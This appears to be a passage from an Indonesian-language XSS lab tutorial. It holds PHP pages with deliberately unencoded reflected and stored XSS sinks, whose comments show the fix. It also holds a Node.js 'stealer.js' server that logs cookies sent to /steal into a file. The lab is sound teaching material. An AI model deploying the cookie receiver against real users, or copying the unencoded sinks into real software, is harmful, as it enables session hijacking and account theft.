<?php
// Greets the visitor using the "name" query-string parameter.
//
// Reflected XSS sink: the parameter is written into the HTML response with
// no output encoding, so any markup it carries is parsed by the browser.
// NOTE(review): presumably left unencoded on purpose for this exercise.
// The encoded form for an HTML text context is:
//   echo "Hello, " . htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
$name = $_GET['name'] ?? null;
if ($name !== null) {
  echo "Hello, {$name}";
}
?>
6. Buat file save_comment.php
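<?php
// save_comment.php: stores one submitted comment (username + comment text).
//
// The two form fields are bound through a prepared statement, so quotes and
// other SQL metacharacters in them are stored as data instead of being parsed
// as part of the INSERT. The text is stored exactly as submitted: HTML output
// encoding belongs in the page that renders it (htmlspecialchars() at display
// time), not in the storage step.
//
// The connection uses root with an empty password, which only suits a
// throwaway local lab database; anywhere else use a dedicated account limited
// to the privileges this script needs.
$conn = new mysqli("localhost", "root", "", "xss_advanced");

// Missing or non-string fields (e.g. username[]=x) are stored as empty strings
// instead of raising "undefined index" / "array to string" notices.
$username = is_string($_POST['username'] ?? null) ? $_POST['username'] : '';
$comment = is_string($_POST['comment'] ?? null) ? $_POST['comment'] : '';

$stmt = $conn->prepare("INSERT INTO comments (username, comment) VALUES (?, ?)");

// Report success only when the row was actually written; the string-built
// query this replaces printed the success message even when the INSERT failed.
if ($stmt === false || !$stmt->bind_param('ss', $username, $comment) || !$stmt->execute()) {
  http_response_code(500);
  echo "Komentar gagal disimpan.<br>";
} else {
  echo "Komentar berhasil disimpan.<br>";
}
if ($stmt !== false) {
  $stmt->close();
}
$conn->close();

echo "<a href='view_comments.php'>Lihat Komentar</a>";
?>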
7. Buat file view_comments.php
<?php
// view_comments.php: prints every row of the comments table as HTML.
//
// Stored XSS sink: both columns are written into the page without output
// encoding, so markup saved in a comment is parsed by every visitor's browser.
// NOTE(review): presumably left unencoded on purpose for this exercise.
// The encoded form applies htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
// to each column at output time. Marking session cookies HttpOnly and serving
// a Content-Security-Policy header are defence-in-depth measures on top of
// that encoding, not replacements for it.
$conn = new mysqli("localhost", "root", "", "xss_advanced");
$result = $conn->query("SELECT * FROM comments");
while ($row = $result->fetch_assoc()) {
  $author = $row['username'];
  $text = $row['comment'];
  echo "<b>{$author}</b>: {$text}<br><hr>";
}
?>
8. Buat file stealer.js
// Lab receiver for the XSS exercise: a small HTTP server that records the
// value of the "c" query parameter sent to /steal.
// NOTE(review): presumably "c" carries document.cookie from the injected page;
// confirm against the payload used in the exercise. A cookie set with the
// HttpOnly attribute is not readable from page script and would not show up
// here, which is the mitigation this step illustrates alongside output
// encoding in view_comments.php.
const http = require('http');
const fs = require('fs');
http.createServer((req, res) => {
  // Second argument `true` makes url.parse() decode the query string into an
  // object, so url.query.c is the percent-decoded parameter value.
  const url = require('url').parse(req.url, true);
  if (url.pathname === '/steal') {
    // The value is written verbatim: it can contain newlines or control
    // characters, so treat stolen_cookies.txt as untrusted input when reading it.
    const log = `Stolen cookie: ${url.query.c}\n`;
    fs.appendFileSync('stolen_cookies.txt', log);
    res.end("OK");
  } else {
    res.end("Nothing here.");
  }
// No host argument: Node listens on all interfaces. If the whole lab runs on
// one machine, .listen(1337, '127.0.0.1') keeps the port off the network.
}).listen(1337);